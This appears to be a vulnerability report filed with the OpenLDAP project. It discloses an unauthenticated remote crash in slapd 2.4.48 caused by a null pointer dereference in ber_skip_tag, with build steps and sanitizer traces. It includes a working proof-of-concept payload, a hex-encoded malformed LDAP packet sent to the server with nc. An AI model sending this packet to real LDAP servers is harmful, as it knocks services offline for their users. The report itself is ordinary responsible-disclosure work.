Full_Name: Stephan Zeisberg Version: 2.4.48 OS: Fedora 31 (kernel 5.3.11-300.fc31.x86_64) URL: Submission from: (NULL) (217.228.59.1)
# Issue description
Unauthenticated remote denial-of-service through malformed ldap packet caused by a null pointer dereference in ber_skip_tag function (libraries/liblber/decode.c).
# Version
openldap-2.4.48.tgz
# How to reproduce
## Compile
$ tar xzvf openldap-2.4.48.tgz $ cd openldap-2.4.48 $ ./configure --prefix=/tmp/openldap $ make depend $ make $ make install $ cd /tmp/openldap
## Start server
$ ./libexec/slapd -d 1 -h ldap://127.0.0.1:9091
## Create PoC crash file
$ echo -n "3084000000b902022da277072d0b312e332e362e312e312e38810038303132353339313934303339cb36352e2e2e2e2e2e2e2ec8a6134cba3e07b6bc691e2e79a9a3f6d0bb7b5d789a8be1058da4a448206401aadcc21bc939ba86a2f30c64f585b9e65fafb0a10d8427736b1bc0422868aa1fda601953d87aa638228bc4ae2dc2f85be810f282847bcab689fb75755eed809d8e284b647ee3c76b52bd6e309d4fa7a2437cf195f6682b4bd303d2de1654160613adb2744b9632515871278b01671ca5a8faf18f736964d34f8da5d40370ec68f2b68b47fe1f2b6d1a04359f54ad827ae21963768ef1f854e03f173e1f57c1b04c5b3dd2a736bb6ea159e5000000000000000272af3a4164acbf51b0b27c7d1ed9ce4b52b0a6b0a4d678fecd8112dd6c4d00" | xxd -r -p > ldap.crash
## Execute PoC (may need to be executed multiple times)
$ nc 127.0.0.1 9091 < ldap.crash
# Valgrind + UBSAN
5de0ddc3 connection_read(12): checking for input on id=1000 ber_get_next ber_scanf fmt ({i}) ber: ==4066091== Thread 3: ==4066091== Invalid read of size 1 ==4066091== at 0x63E1DF: ber_skip_tag (decode.c:256) ==4066091== by 0x63F7A8: ber_scanf (decode.c:865) ==4066091== by 0x4FD051: cancel_extop (cancel.c:52) ==4066091== by 0x4BE530: fe_extended (extended.c:222) ==4066091== by 0x4BE36B: do_extended (extended.c:177) ==4066091== by 0x472CA7: connection_operation (connection.c:1158) ==4066091== by 0x471331: connection_read_thread (connection.c:1294) ==4066091== by 0x5FEE79: ldap_int_thread_pool_wrapper (tpool.c:696) ==4066091== by 0xCA384E1: start_thread (in /usr/lib64/libpthread-2.30.so) ==4066091== by 0xCCC6692: clone (in /usr/lib64/libc-2.30.so) ==4066091== Address 0x0 is not stack'd, malloc'd or (recently) free'd ==4066091== UndefinedBehaviorSanitizer5de0ddc3 ber_get_next on fd 12 failed errno=0 (Success) :DEADLYSIGNAL ==4066091==ERROR: UndefinedBehaviorSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000063e1df bp 0x00004ee77660 sp 0x00004ee77640 T4066125) ==4066091==The signal is caused by a READ memory access. ==4066091==Hint: address points to the zero page. ==4066129== Warning: invalid file descriptor 1024 in syscall close() #0 0x63e1de in ber_skip_tag /tmp/openldap-2.4.48/libraries/liblber/decode.c:255:15 #1 0x63f7a8 in ber_scanf /tmp/openldap-2.4.48/libraries/liblber/decode.c:865:10 #2 0x4fd051 in cancel_extop /tmp/openldap-2.4.48/servers/slapd/cancel.c:52:7 #3 0x4be530 in fe_extended /tmp/openldap-2.4.48/servers/slapd/extended.c:222:16 #4 0x4be36b in do_extended /tmp/openldap-2.4.48/servers/slapd/extended.c:177:15 #5 0x472ca7 in connection_operation /tmp/openldap-2.4.48/servers/slapd/connection.c:1158:7 #6 0x471331 in connection_read_thread /tmp/openldap-2.4.48/servers/slapd/connection.c:1294:14 #7 0x5fee79 in ldap_int_thread_pool_wrapper /tmp/openldap-2.4.48/libraries/libldap_r/tpool.c:696:3 #8 0xca384e1 in start_thread (/lib64/libpthread.so.0+0x94e1) #9 0xccc6692 in clone (/lib64/libc.so.6+0x101692)
UndefinedBehaviorSanitizer can not provide additional info.
Please let me know what additional information I can provide to successfully reproduce the issue.
Note: I have also tested and reproduced the issue using the precompiled package from the Fedora repositories: openldap-servers-2.4.47-3.fc31.x86_64 (OpenLDAP: slapd 2.4.47 (Jul 25 2019 00:00:00))
-Stephan Zeisberg